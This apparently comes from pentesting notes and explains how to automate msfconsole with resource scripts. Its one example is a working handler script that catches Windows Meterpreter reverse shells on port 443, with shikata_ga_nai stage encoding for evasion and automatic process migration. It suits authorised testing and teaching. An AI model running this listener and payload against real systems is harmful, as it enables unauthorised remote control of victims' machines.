Automation

Metasploit resource scripts can automate the operations in msfconsole, just like gdbscripts. For example, save the following resource script as setup.rc:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 443
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
set AutoRunScript post/windows/manage/migrate 
set ExitOnSession false
exploit -j -z

Execute it with the -r flag (which stands for "resource"):

msfconsole -r setup.rc

Last updated